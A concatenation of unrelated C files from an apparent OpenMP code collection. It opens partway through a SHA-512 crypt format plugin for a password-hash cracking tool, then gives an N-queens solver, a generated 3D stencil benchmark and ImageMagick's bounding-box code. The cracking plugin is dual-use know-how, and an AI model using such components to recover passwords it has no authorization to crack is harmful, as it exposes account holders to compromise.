out.rounds = srounds > ROUNDS_MAX ?
ROUNDS_MAX : srounds;
}
}
for (len = 0; ciphertext[len] != '$'; len++);
if (len > SALT_LENGTH)
len = SALT_LENGTH;
memcpy(out.salt, ciphertext, len);
out.len = len;
return &out;
}
static int cmp_all(void *binary, int count)
{
int index = 0;
for (; index < count; index++)
if (!memcmp(binary, crypt_out[index], ARCH_SIZE))
return 1;
return 0;
}
static int cmp_one(void *binary, int index)
{
return !memcmp(binary, crypt_out[index], BINARY_SIZE);
}
static int cmp_exact(char *source, int index)
{
return 1;
}
static unsigned int sha512crypt_iterations(void *salt)
{
struct saltstruct *sha512crypt_salt;
sha512crypt_salt = salt;
return (unsigned int)sha512crypt_salt->rounds;
}
// Public domain hash function by DJ Bernstein
// We are hashing the entire struct
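// (djb2, "times 33 xor" variant: hash = hash * 33 ^ byte)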
static int salt_hash(void *salt)
{
unsigned char *s = salt;
unsigned int hash = 5381;
unsigned int i;
for (i = 0; i < SALT_SIZE; i++)
hash = ((hash << 5) + hash) ^ s[i];
return hash & (SALT_HASH_SIZE - 1);
}
struct fmt_main fmt_cryptsha512 = {
{
FORMAT_LABEL,
FORMAT_NAME,
"SHA512 " ALGORITHM_NAME,
BENCHMARK_COMMENT,
BENCHMARK_LENGTH,
0,
PLAINTEXT_LENGTH,
BINARY_SIZE,
BINARY_ALIGN,
SALT_SIZE,
SALT_ALIGN,
MIN_KEYS_PER_CRYPT,
MAX_KEYS_PER_CRYPT,
FMT_CASE | FMT_8_BIT | FMT_OMP,
{
"iteration count",
},
{ FORMAT_TAG },
tests
}, {
init,
done,
fmt_default_reset,
fmt_default_prepare,
valid,
fmt_default_split,
get_binary,
get_salt,
{
sha512crypt_iterations,
},
fmt_default_source,
{
fmt_default_binary_hash_0,
fmt_default_binary_hash_1,
fmt_default_binary_hash_2,
fmt_default_binary_hash_3,
fmt_default_binary_hash_4,
fmt_default_binary_hash_5,
fmt_default_binary_hash_6
},
salt_hash,
NULL,
set_salt,
set_key,
get_key,
fmt_default_clear_keys,
crypt_all,
{
#define COMMON_GET_HASH_LINK
#include "common-get-hash.h"
},
cmp_all,
cmp_one,
cmp_exact
}
};
#endif /* plugin stanza */
|
main.c | #include <omp.h>
#include <stdio.h>
#include <stdint.h>
#define MAX_N 16
char BLOCK[MAX_N*MAX_N + 1]; // +1 for the NUL scanf writes after the last row
static inline int abs(int x) { // static: plain C99 `inline` has no standalone definition
// mask of sign bit
uint32_t y = x >> 31;
// toggle the sign bit
x ^= y;
// add 1 if x is negative (2's complement)
x += y & 1;
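// Worked example (two's complement, arithmetic shift): x = -5 gives
// y = 0xFFFFFFFF, x ^= y yields 4 (~(-5)), x += 1 yields 5; for x = 7,
// y = 0 and x is unchanged.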
return x;
}
int place(int board[], int N, int row, int col) {
if (BLOCK[row*N + col] == '*') {
// blockage
return 0;
}
for (int i = 0; i < row; i++) {
if (board[i] == col) {
// column conflict
return 0;
} else if (abs(board[i] - col) == abs(i-row)) {
// diagonal conflict
return 0;
}
}
return 1;
}
int _queen(int board[], int r, int N, int count) {
for (int c = 0; c < N; c++) {
//printf("r=%d, c=%d\n", row, c);
if (place(board, N, r, c)) {
board[r] = c;
if (r == N-1) {
//printf(".. found!\n");
count++;
} else {
//printf(".. deeper\n");
count = _queen(board, r+1, N, count);
}
}
}
return count;
}
int queen(int N) {
int count = 0;
int board[MAX_N] = {0};
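// The first three rows are expanded into N^3 independent subproblems so the
// collapse(3) loop nest gives OpenMP enough parallel work; firstprivate(board)
// hands each thread its own copy of the partially filled board.
// Note: this decomposition assumes N >= 3; a 1x1 board yields no solutions here.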
#pragma omp parallel for collapse(3) \
firstprivate(board) \
reduction(+ : count) \
schedule(dynamic)
for (int i = 0; i < N; i++) {
for (int j = 0; j < N; j++) {
for (int k = 0; k < N; k++) {
if (!place(board, N, 0, i)) {
continue;
}
board[0] = i;
if (!place(board, N, 1, j)) {
continue;
}
board[1] = j;
if (!place(board, N, 2, k)) {
continue;
}
board[2] = k;
count += _queen(board, 3, N, 0);
}
}
}
return count;
//return _queen(0, N, 0);
}
int main(void) {
int N, n_case = 0;
while (scanf("%d", &N) != EOF) {
n_case++;
for (int i = 0; i < N*N; i += N) {
scanf("%s", &BLOCK[i]);
}
/*
for (int i = 0; i < N*N; i++) {
printf("%c ", BLOCK[i]);
if ((i+1)%N == 0) {
printf("\n");
}
}
*/
printf("Case %d: %d\n", n_case, queen(N));
}
return 0;
}
|
3d25pt.lbpar.c | #include <omp.h>
#include <math.h>
#define ceild(n,d) ceil(((double)(n))/((double)(d)))
#define floord(n,d) floor(((double)(n))/((double)(d)))
#define max(x,y) ((x) > (y)? (x) : (y))
#define min(x,y) ((x) < (y)? (x) : (y))
/*
* Order-2, 3D 25 point stencil
* Adapted from PLUTO and Pochoir test bench
*
* Tareq Malas
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#ifdef LIKWID_PERFMON
#include <likwid.h>
#endif
#include "print_utils.h"
#define TESTS 2
#define MAX(a,b) ((a) > (b) ? a : b)
#define MIN(a,b) ((a) < (b) ? a : b)
#ifndef min
#define min(x,y) ((x) < (y)? (x) : (y))
#endif
/* Subtract the `struct timeval' values X and Y,
* storing the result in RESULT.
*
* Return 1 if the difference is negative, otherwise 0.
*/
int timeval_subtract(struct timeval *result, struct timeval *x, struct timeval *y)
{
/* Perform the carry for the later subtraction by updating y. */
if (x->tv_usec < y->tv_usec)
{
int nsec = (y->tv_usec - x->tv_usec) / 1000000 + 1;
y->tv_usec -= 1000000 * nsec;
y->tv_sec += nsec;
}
if (x->tv_usec - y->tv_usec > 1000000)
{
int nsec = (x->tv_usec - y->tv_usec) / 1000000;
y->tv_usec += 1000000 * nsec;
y->tv_sec -= nsec;
}
/* Compute the time remaining to wait.
* tv_usec is certainly positive.
*/
result->tv_sec = x->tv_sec - y->tv_sec;
result->tv_usec = x->tv_usec - y->tv_usec;
/* Return 1 if result is negative. */
return x->tv_sec < y->tv_sec;
}
int main(int argc, char *argv[])
{
int t, i, j, k, test;
int Nx, Ny, Nz, Nt;
if (argc > 3) {
Nx = atoi(argv[1])+8;
Ny = atoi(argv[2])+8;
Nz = atoi(argv[3])+8;
} else {
// Nx/Ny/Nz were previously used uninitialized when absent; require them.
fprintf(stderr, "Usage: %s Nx Ny Nz [Nt]\n", argv[0]);
return 1;
}
if (argc > 4)
Nt = atoi(argv[4]);
else
Nt = 50; // arbitrary default (assumption); Nt was previously left uninitialized
double ****A = (double ****) malloc(sizeof(double***)*2);
double ***roc2; // allocated below; the former size-of-one malloc here leaked
A[0] = (double ***) malloc(sizeof(double**)*Nz);
A[1] = (double ***) malloc(sizeof(double**)*Nz);
roc2 = (double ***) malloc(sizeof(double**)*Nz);
for(i=0; i<Nz; i++){
A[0][i] = (double**) malloc(sizeof(double*)*Ny);
A[1][i] = (double**) malloc(sizeof(double*)*Ny);
roc2[i] = (double**) malloc(sizeof(double*)*Ny);
for(j=0;j<Ny;j++){
A[0][i][j] = (double*) malloc(sizeof(double)*Nx);
A[1][i][j] = (double*) malloc(sizeof(double)*Nx);
roc2[i][j] = (double*) malloc(sizeof(double)*Nx);
}
}
// tile size information, including extra element to decide the list length
int *tile_size = (int*) malloc(sizeof(int));
tile_size[0] = -1;
// The list is modified here before source-to-source transformations
tile_size = (int*) realloc((void *)tile_size, sizeof(int)*5);
tile_size[0] = 24;
tile_size[1] = 24;
tile_size[2] = 8;
tile_size[3] = 64;
tile_size[4] = -1;
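// Tile sizes (24 x 24 x 8 x 64) are consumed by the PLUTO-generated loop
// nest below; the trailing -1 marks the end of the list.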
// for timekeeping
int ts_return = -1;
struct timeval start, end, result;
double tdiff = 0.0, min_tdiff=1.e100;
const int BASE = 1024;
// initialize variables
//
srand(42);
for (i = 1; i < Nz; i++) {
for (j = 1; j < Ny; j++) {
for (k = 1; k < Nx; k++) {
A[0][i][j][k] = 1.0 * (rand() % BASE);
roc2[i][j][k] = 2.0 * (rand() % BASE);
}
}
}
#ifdef LIKWID_PERFMON
LIKWID_MARKER_INIT;
#pragma omp parallel
{
LIKWID_MARKER_THREADINIT;
#pragma omp barrier
LIKWID_MARKER_START("calc");
}
#endif
int num_threads = 1;
#if defined(_OPENMP)
num_threads = omp_get_max_threads();
#endif
const double coef0 = -0.28472;
const double coef1 = 0.16000;
const double coef2 = -0.02000;
const double coef3 = 0.00254;
const double coef4 = -0.00018;
for(test=0; test<TESTS; test++){
gettimeofday(&start, 0);
// serial execution - Addition: 6 && Multiplication: 2
int t1, t2, t3, t4, t5, t6, t7, t8;
int lb, ub, lbp, ubp, lb2, ub2;
register int lbv, ubv;
/* Start of CLooG code */
if ((Nt >= 1) && (Nx >= 9) && (Ny >= 9) && (Nz >= 9)) {
for (t1=-1;t1<=floord(Nt-1,3);t1++) {
lbp=max(ceild(t1,2),ceild(6*t1-Nt+2,6));
ubp=min(floord(4*Nt+Nz-9,24),floord(12*t1+Nz+6,24));
#pragma omp parallel for private(lbv,ubv,t3,t4,t5,t6,t7,t8)
for (t2=lbp;t2<=ubp;t2++) {
for (t3=max(max(max(0,ceild(3*t1,2)),ceild(24*t2-Nz+5,8)),3*t1-3*t2+1);t3<=min(min(min(floord(4*Nt+Ny-9,8),floord(12*t1+Ny+15,8)),floord(24*t2+Ny+11,8)),floord(24*t1-24*t2+Nz+Ny+13,8));t3++) {
for (t4=max(max(max(max(0,ceild(3*t1-3*t2-6,8)),ceild(3*t1-14,16)),ceild(24*t2-Nz-51,64)),ceild(8*t3-Ny-51,64));t4<=min(min(min(min(floord(4*Nt+Nx-9,64),floord(12*t1+Nx+15,64)),floord(24*t2+Nx+11,64)),floord(8*t3+Nx-5,64)),floord(24*t1-24*t2+Nz+Nx+13,64));t4++) {
for (t5=max(max(max(max(max(0,ceild(24*t2-Nz+5,4)),ceild(8*t3-Ny+5,4)),ceild(64*t4-Nx+5,4)),3*t1),6*t1-6*t2+1);t5<=min(min(min(min(min(floord(24*t1-24*t2+Nz+18,4),2*t3),Nt-1),3*t1+5),6*t2+4),16*t4+14);t5++) {
for (t6=max(max(24*t2,4*t5+4),-24*t1+24*t2+8*t5-23);t6<=min(min(24*t2+23,-24*t1+24*t2+8*t5),4*t5+Nz-5);t6++) {
for (t7=max(8*t3,4*t5+4);t7<=min(8*t3+7,4*t5+Ny-5);t7++) {
lbv=max(64*t4,4*t5+4);
ubv=min(64*t4+63,4*t5+Nx-5);
#pragma ivdep
#pragma vector always
for (t8=lbv;t8<=ubv;t8++) {
A[(t5+1)%2][-4*t5+t6][-4*t5+t7][-4*t5+t8] =
  2.0 * A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8]
  - A[(t5+1)%2][-4*t5+t6][-4*t5+t7][-4*t5+t8]
  + roc2[-4*t5+t6][-4*t5+t7][-4*t5+t8] *
    (coef0 * A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8]
     + coef1 * (A[t5%2][-4*t5+t6-1][-4*t5+t7][-4*t5+t8] + A[t5%2][-4*t5+t6+1][-4*t5+t7][-4*t5+t8]
              + A[t5%2][-4*t5+t6][-4*t5+t7-1][-4*t5+t8] + A[t5%2][-4*t5+t6][-4*t5+t7+1][-4*t5+t8]
              + A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8-1] + A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8+1])
     + coef2 * (A[t5%2][-4*t5+t6-2][-4*t5+t7][-4*t5+t8] + A[t5%2][-4*t5+t6+2][-4*t5+t7][-4*t5+t8]
              + A[t5%2][-4*t5+t6][-4*t5+t7-2][-4*t5+t8] + A[t5%2][-4*t5+t6][-4*t5+t7+2][-4*t5+t8]
              + A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8-2] + A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8+2])
     + coef3 * (A[t5%2][-4*t5+t6-3][-4*t5+t7][-4*t5+t8] + A[t5%2][-4*t5+t6+3][-4*t5+t7][-4*t5+t8]
              + A[t5%2][-4*t5+t6][-4*t5+t7-3][-4*t5+t8] + A[t5%2][-4*t5+t6][-4*t5+t7+3][-4*t5+t8]
              + A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8-3] + A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8+3])
     + coef4 * (A[t5%2][-4*t5+t6-4][-4*t5+t7][-4*t5+t8] + A[t5%2][-4*t5+t6+4][-4*t5+t7][-4*t5+t8]
              + A[t5%2][-4*t5+t6][-4*t5+t7-4][-4*t5+t8] + A[t5%2][-4*t5+t6][-4*t5+t7+4][-4*t5+t8]
              + A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8-4] + A[t5%2][-4*t5+t6][-4*t5+t7][-4*t5+t8+4]));
}
}
}
}
}
}
}
}
}
/* End of CLooG code */
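// In the tiled nest above, t5 enumerates time steps (double-buffered through
// t5 % 2) while t6/t7/t8 sweep the z/y/x coordinates shifted by 4*t5; the
// skew is what keeps the time-tiled dependences satisfied.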
gettimeofday(&end, 0);
ts_return = timeval_subtract(&result, &end, &start);
tdiff = (double) (result.tv_sec + result.tv_usec * 1.0e-6);
min_tdiff = MIN(min_tdiff, tdiff);
printf("Rank 0 TEST# %d time: %f\n", test, tdiff);
}
PRINT_RESULTS(4, "constant")
#ifdef LIKWID_PERFMON
#pragma omp parallel
{
LIKWID_MARKER_STOP("calc");
}
LIKWID_MARKER_CLOSE;
#endif
// Free allocated arrays
for(i=0; i<Nz; i++){
for(j=0;j<Ny;j++){
free(A[0][i][j]);
free(A[1][i][j]);
free(roc2[i][j]);
}
free(A[0][i]);
free(A[1][i]);
free(roc2[i]);
}
free(A[0]);
free(A[1]);
free(roc2);
return 0;
}
|
attribute.c | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% AAA TTTTT TTTTT RRRR IIIII BBBB U U TTTTT EEEEE %
% A A T T R R I B B U U T E %
% AAAAA T T RRRR I BBBB U U T EEE %
% A A T T R R I B B U U T E %
% A A T T R R IIIII BBBB UUU T EEEEE %
% %
% %
% MagickCore Get / Set Image Attributes %
% %
% Software Design %
% Cristy %
% October 2002 %
% %
% %
% Copyright 1999-2021 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% https://imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/artifact.h"
#include "MagickCore/attribute.h"
#include "MagickCore/blob.h"
#include "MagickCore/blob-private.h"
#include "MagickCore/cache.h"
#include "MagickCore/cache-private.h"
#include "MagickCore/cache-view.h"
#include "MagickCore/channel.h"
#include "MagickCore/client.h"
#include "MagickCore/color.h"
#include "MagickCore/color-private.h"
#include "MagickCore/colormap.h"
#include "MagickCore/colormap-private.h"
#include "MagickCore/colorspace.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/composite.h"
#include "MagickCore/composite-private.h"
#include "MagickCore/constitute.h"
#include "MagickCore/draw.h"
#include "MagickCore/draw-private.h"
#include "MagickCore/effect.h"
#include "MagickCore/enhance.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/geometry.h"
#include "MagickCore/histogram.h"
#include "MagickCore/identify.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/list.h"
#include "MagickCore/log.h"
#include "MagickCore/memory_.h"
#include "MagickCore/magick.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/option.h"
#include "MagickCore/paint.h"
#include "MagickCore/pixel.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/property.h"
#include "MagickCore/quantize.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/random_.h"
#include "MagickCore/resource_.h"
#include "MagickCore/semaphore.h"
#include "MagickCore/segment.h"
#include "MagickCore/splay-tree.h"
#include "MagickCore/string_.h"
#include "MagickCore/string-private.h"
#include "MagickCore/thread-private.h"
#include "MagickCore/threshold.h"
#include "MagickCore/transform.h"
#include "MagickCore/utility.h"
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ G e t I m a g e B o u n d i n g B o x %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageBoundingBox() returns the bounding box of an image canvas.
%
% The format of the GetImageBoundingBox method is:
%
% RectangleInfo GetImageBoundingBox(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o bounds: Method GetImageBoundingBox returns the bounding box of an
% image canvas.
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
typedef struct _EdgeInfo
{
double
left,
right,
top,
bottom;
} EdgeInfo;
static double GetEdgeBackgroundCensus(const Image *image,
const CacheView *image_view,const GravityType gravity,const size_t width,
const size_t height,const ssize_t x_offset,const ssize_t y_offset,
ExceptionInfo *exception)
{
CacheView
*edge_view;
const char
*artifact;
double
census;
Image
*edge_image;
PixelInfo
background,
pixel;
RectangleInfo
edge_geometry;
const Quantum
*p;
ssize_t
y;
/*
Determine the percent of image background for this edge.
*/
switch (gravity)
{
case NorthWestGravity:
case NorthGravity:
default:
{
p=GetCacheViewVirtualPixels(image_view,0,0,1,1,exception);
break;
}
case NorthEastGravity:
case EastGravity:
{
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,0,1,1,
exception);
break;
}
case SouthEastGravity:
case SouthGravity:
{
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,
(ssize_t) image->rows-1,1,1,exception);
break;
}
case SouthWestGravity:
case WestGravity:
{
p=GetCacheViewVirtualPixels(image_view,0,(ssize_t) image->rows-1,1,1,
exception);
break;
}
}
GetPixelInfoPixel(image,p,&background);
artifact=GetImageArtifact(image,"background");
if (artifact != (const char *) NULL)
(void) QueryColorCompliance(artifact,AllCompliance,&background,exception);
artifact=GetImageArtifact(image,"trim:background-color");
if (artifact != (const char *) NULL)
(void) QueryColorCompliance(artifact,AllCompliance,&background,exception);
edge_geometry.width=width;
edge_geometry.height=height;
edge_geometry.x=x_offset;
edge_geometry.y=y_offset;
GravityAdjustGeometry(image->columns,image->rows,gravity,&edge_geometry);
edge_image=CropImage(image,&edge_geometry,exception);
if (edge_image == (Image *) NULL)
return(0.0);
census=0.0;
edge_view=AcquireVirtualCacheView(edge_image,exception);
for (y=0; y < (ssize_t) edge_image->rows; y++)
{
ssize_t
x;
p=GetCacheViewVirtualPixels(edge_view,0,y,edge_image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) edge_image->columns; x++)
{
GetPixelInfoPixel(edge_image,p,&pixel);
if (IsFuzzyEquivalencePixelInfo(&pixel,&background) == MagickFalse)
census++;
p+=GetPixelChannels(edge_image);
}
}
census/=((double) edge_image->columns*edge_image->rows);
edge_view=DestroyCacheView(edge_view);
edge_image=DestroyImage(edge_image);
return(census);
}
static inline double GetMinEdgeBackgroundCensus(const EdgeInfo *edge)
{
double
census;
census=MagickMin(MagickMin(MagickMin(edge->left,edge->right),edge->top),
edge->bottom);
return(census);
}
static RectangleInfo GetEdgeBoundingBox(const Image *image,
ExceptionInfo *exception)
{
CacheView
*edge_view;
const char
*artifact;
double
background_census,
percent_background;
EdgeInfo
edge,
vertex;
Image
*edge_image;
RectangleInfo
bounds;
/*
Get the image bounding box.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
SetGeometry(image,&bounds);
edge_image=CloneImage(image,0,0,MagickTrue,exception);
if (edge_image == (Image *) NULL)
return(bounds);
(void) ParseAbsoluteGeometry("0x0+0+0",&edge_image->page);
(void) memset(&vertex,0,sizeof(vertex));
edge_view=AcquireVirtualCacheView(edge_image,exception);
edge.left=GetEdgeBackgroundCensus(edge_image,edge_view,WestGravity,
1,0,0,0,exception);
edge.right=GetEdgeBackgroundCensus(edge_image,edge_view,EastGravity,
1,0,0,0,exception);
edge.top=GetEdgeBackgroundCensus(edge_image,edge_view,NorthGravity,
0,1,0,0,exception);
edge.bottom=GetEdgeBackgroundCensus(edge_image,edge_view,SouthGravity,
0,1,0,0,exception);
percent_background=1.0;
artifact=GetImageArtifact(edge_image,"trim:percent-background");
if (artifact != (const char *) NULL)
percent_background=StringToDouble(artifact,(char **) NULL)/100.0;
percent_background=MagickMin(MagickMax(1.0-percent_background,MagickEpsilon),
1.0);
background_census=GetMinEdgeBackgroundCensus(&edge);
for ( ; background_census < percent_background;
background_census=GetMinEdgeBackgroundCensus(&edge))
{
if ((bounds.width == 0) || (bounds.height == 0))
break;
if (fabs(edge.left-background_census) < MagickEpsilon)
{
/*
Trim left edge.
*/
vertex.left++;
bounds.width--;
edge.left=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,1,bounds.height,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.top=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.bottom=GetEdgeBackgroundCensus(edge_image,edge_view,
SouthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.bottom,exception);
continue;
}
if (fabs(edge.right-background_census) < MagickEpsilon)
{
/*
Trim right edge.
*/
vertex.right++;
bounds.width--;
edge.right=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthEastGravity,1,bounds.height,(ssize_t) vertex.right,(ssize_t)
vertex.top,exception);
edge.top=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.bottom=GetEdgeBackgroundCensus(edge_image,edge_view,
SouthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.bottom,exception);
continue;
}
if (fabs(edge.top-background_census) < MagickEpsilon)
{
/*
Trim top edge.
*/
vertex.top++;
bounds.height--;
edge.left=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,1,bounds.height,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.right=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthEastGravity,1,bounds.height,(ssize_t) vertex.right,(ssize_t)
vertex.top,exception);
edge.top=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
continue;
}
if (fabs(edge.bottom-background_census) < MagickEpsilon)
{
/*
Trim bottom edge.
*/
vertex.bottom++;
bounds.height--;
edge.left=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthWestGravity,1,bounds.height,(ssize_t) vertex.left,(ssize_t)
vertex.top,exception);
edge.right=GetEdgeBackgroundCensus(edge_image,edge_view,
NorthEastGravity,1,bounds.height,(ssize_t) vertex.right,(ssize_t)
vertex.top,exception);
edge.bottom=GetEdgeBackgroundCensus(edge_image,edge_view,
SouthWestGravity,bounds.width,1,(ssize_t) vertex.left,(ssize_t)
vertex.bottom,exception);
continue;
}
}
edge_view=DestroyCacheView(edge_view);
edge_image=DestroyImage(edge_image);
bounds.x=(ssize_t) vertex.left;
bounds.y=(ssize_t) vertex.top;
if ((bounds.width == 0) || (bounds.height == 0))
(void) ThrowMagickException(exception,GetMagickModule(),OptionWarning,
"GeometryDoesNotContainImage","`%s'",image->filename);
return(bounds);
}
MagickExport RectangleInfo GetImageBoundingBox(const Image *image,
ExceptionInfo *exception)
{
CacheView
*image_view;
const char
*artifact;
MagickBooleanType
status;
PixelInfo
target[4],
zero;
RectangleInfo
bounds;
const Quantum
*p;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
artifact=GetImageArtifact(image,"trim:percent-background");
if (artifact != (const char *) NULL)
return(GetEdgeBoundingBox(image,exception));
artifact=GetImageArtifact(image, "trim:edges");
if (artifact == (const char *) NULL)
{
bounds.width=image->columns == 1 ? 1 : 0;
bounds.height=image->rows == 1 ? 1 : 0;
bounds.x=(ssize_t) image->columns;
bounds.y=(ssize_t) image->rows;
}
else
{
char
*edges,
*q,
*r;
bounds.width=(size_t) image->columns;
bounds.height=(size_t) image->rows;
bounds.x=0;
bounds.y=0;
edges=AcquireString(artifact);
r=edges;
while ((q=StringToken(",",&r)) != (char *) NULL)
{
if (LocaleCompare(q,"north") == 0)
bounds.y=(ssize_t) image->rows;
if (LocaleCompare(q,"east") == 0)
bounds.width=0;
if (LocaleCompare(q,"south") == 0)
bounds.height=0;
if (LocaleCompare(q,"west") == 0)
bounds.x=(ssize_t) image->columns;
}
edges=DestroyString(edges);
}
GetPixelInfo(image,&target[0]);
image_view=AcquireVirtualCacheView(image,exception);
p=GetCacheViewVirtualPixels(image_view,0,0,1,1,exception);
if (p == (const Quantum *) NULL)
{
image_view=DestroyCacheView(image_view);
return(bounds);
}
GetPixelInfoPixel(image,p,&target[0]);
GetPixelInfo(image,&target[1]);
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,0,1,1,
exception);
if (p != (const Quantum *) NULL)
GetPixelInfoPixel(image,p,&target[1]);
GetPixelInfo(image,&target[2]);
p=GetCacheViewVirtualPixels(image_view,0,(ssize_t) image->rows-1,1,1,
exception);
if (p != (const Quantum *) NULL)
GetPixelInfoPixel(image,p,&target[2]);
p=GetCacheViewVirtualPixels(image_view,(ssize_t) image->columns-1,(ssize_t)
image->rows-1,1,1,exception);
if (p != (const Quantum *) NULL)
GetPixelInfoPixel(image,p,&target[3]);
status=MagickTrue;
GetPixelInfo(image,&zero);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
PixelInfo
pixel;
RectangleInfo
bounding_box;
const Quantum
*magick_restrict q;
ssize_t
x;
if (status == MagickFalse)
continue;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
# pragma omp critical (MagickCore_GetImageBoundingBox)
#endif
bounding_box=bounds;
q=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (q == (const Quantum *) NULL)
{
status=MagickFalse;
continue;
}
pixel=zero;
for (x=0; x < (ssize_t) image->columns; x++)
{
GetPixelInfoPixel(image,q,&pixel);
if ((x < bounding_box.x) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[0]) == MagickFalse))
bounding_box.x=x;
if ((x > (ssize_t) bounding_box.width) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[1]) == MagickFalse))
bounding_box.width=(size_t) x;
if ((y < bounding_box.y) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[0]) == MagickFalse))
bounding_box.y=y;
if ((y > (ssize_t) bounding_box.height) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[2]) == MagickFalse))
bounding_box.height=(size_t) y;
if ((x < (ssize_t) bounding_box.width) &&
(y > (ssize_t) bounding_box.height) &&
(IsFuzzyEquivalencePixelInfo(&pixel,&target[3]) == MagickFalse))
{
bounding_box.width=(size_t) x;
bounding_box.height=(size_t) y;
}
q+=GetPixelChannels(image);
}
#if defined(MAGICKCORE_OPENMP_SUPPORT)
# pragma omp critical (MagickCore_GetImageBoundingBox)
#endif
{
if (bounding_box.x < bounds.x)
bounds.x=bounding_box.x;
if (bounding_box.y < bounds.y)
bounds.y=bounding_box.y;
if (bounding_box.width > bounds.width)
bounds.width=bounding_box.width;
if (bounding_box.height > bounds.height)
bounds.height=bounding_box.height;
}
}
image_view=DestroyCacheView(image_view);
if ((bounds.width == 0) || (bounds.height == 0))
(void) ThrowMagickException(exception,GetMagickModule(),OptionWarning,
"GeometryDoesNotContainImage","`%s'",image->filename);
else
{
bounds.width-=(bounds.x-1);
bounds.height-=(bounds.y-1);
}
return(bounds);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C o n v e x H u l l %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageConvexHull() returns the convex hull points of an image canvas.
%
% The format of the GetImageConvexHull method is:
%
% PointInfo *GetImageConvexHull(const Image *image,
% size_t number_vertices,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o number_vertices: the number of vertices in the convex hull.
%
% o exception: return any errors or warnings in this structure.
%
*/
static double LexicographicalOrder(PointInfo *a,PointInfo *b,PointInfo *c)
{
/*
Cross product of (b-a) and (c-a): positive when a, b, and c make a
counterclockwise turn, zero when they are collinear.
*/
return((b->x-a->x)*(c->y-a->y)-(b->y-a->y)*(c->x-a->x));
}
